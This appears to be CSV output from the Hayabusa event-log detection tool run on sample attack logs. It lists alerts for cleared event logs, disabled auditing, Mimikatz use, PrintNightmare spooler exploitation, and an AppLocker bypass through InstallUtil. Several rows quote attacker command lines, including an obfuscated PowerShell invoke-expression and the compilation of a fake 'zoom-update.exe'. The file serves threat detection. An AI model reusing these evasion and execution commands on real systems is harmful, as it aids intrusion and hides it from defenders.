2021-10-26 03:11:11.997 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:12.059 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:12.075 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:12.106 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:12.153 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:12.184 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:12.247 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:21:02.504 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Audit policy enumerated.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-27 19:09:16.280 +09:00,fs03vuln.offsec.lan,823,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
2021-10-27 19:12:47.151 +09:00,fs03vuln.offsec.lan,4674,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx"
2021-10-27 19:12:47.229 +09:00,fs03vuln.offsec.lan,5142,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx"
2021-10-27 19:12:47.323 +09:00,fs03vuln.offsec.lan,823,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
2021-10-27 19:14:21.369 +09:00,fs03vuln.offsec.lan,302,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
2021-10-27 19:14:21.369 +09:00,fs03vuln.offsec.lan,849,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
2021-10-27 19:14:21.369 +09:00,fs03vuln.offsec.lan,301,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
2021-10-27 19:14:27.403 +09:00,fs03vuln.offsec.lan,823,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
2021-10-27 19:14:27.403 +09:00,fs03vuln.offsec.lan,4674,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx"
2021-10-27 19:14:27.466 +09:00,fs03vuln.offsec.lan,848,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
2021-10-27 19:14:27.466 +09:00,fs03vuln.offsec.lan,5142,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx"
2021-10-27 19:14:27.559 +09:00,fs03vuln.offsec.lan,823,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
2021-10-27 19:14:27.559 +09:00,fs03vuln.offsec.lan,300,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
2021-10-27 19:28:26.260 +09:00,FS03.offsec.lan,354,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx
2021-10-27 19:28:26.260 +09:00,FS03.offsec.lan,354,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx
2021-10-27 19:28:26.307 +09:00,FS03.offsec.lan,823,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx
2021-10-27 19:34:49.837 +09:00,FS03.offsec.lan,6416,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,6416 New external device connected (PrintNightmare).evtx"
2021-10-27 19:34:50.024 +09:00,FS03.offsec.lan,4674,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,6416 New external device connected (PrintNightmare).evtx"
2021-10-28 22:41:21.325 +09:00,FS03.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface  :  Command: ""cmd.exe""  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\System32\spoolsv.exe",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/1-Print spool spawned a CMD shell (PrintNightMare).evtx
2021-10-28 22:41:21.325 +09:00,FS03.offsec.lan,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/1-Print spool spawned a CMD shell (PrintNightMare).evtx
2021-11-02 23:15:23.676 +09:00,fs03vuln.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1140-Deobfuscate-Decode Files or Information/ID4688-Certutil download.evtx
2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1086,technique_name=PowerShell  :  Command: powershell $env:I4Pzl|.(Get-C`ommand ('{1}e{0}'-f'x','i'))  :  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  :  User: OFFSEC\admmig  :  Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx
2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx
2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx
2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx
2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,WMI Spawning Windows PowerShell,,rules/sigma/process_creation/win_wmi_spwns_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx
2021-11-18 16:40:29.566 +09:00,PC-01.cybercat.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface  :  Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  /unsafe /nologo /target:exe /out:zoom-update.exe C:\Users\pc1-user\Desktop\zoom-update.cs  :  Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  :  User: CYBERCAT\pc1-user  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx
2021-11-18 16:42:54.822 +09:00,PC-01.cybercat.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1218.004,technique_name=InstallUtil  :  Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  /logfile= /LogToConsole=false /U C:\Users\pc1-user\Desktop\zoom-update.exe  :  Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  :  User: CYBERCAT\pc1-user  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx
2021-11-18 16:42:54.822 +09:00,PC-01.cybercat.local,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx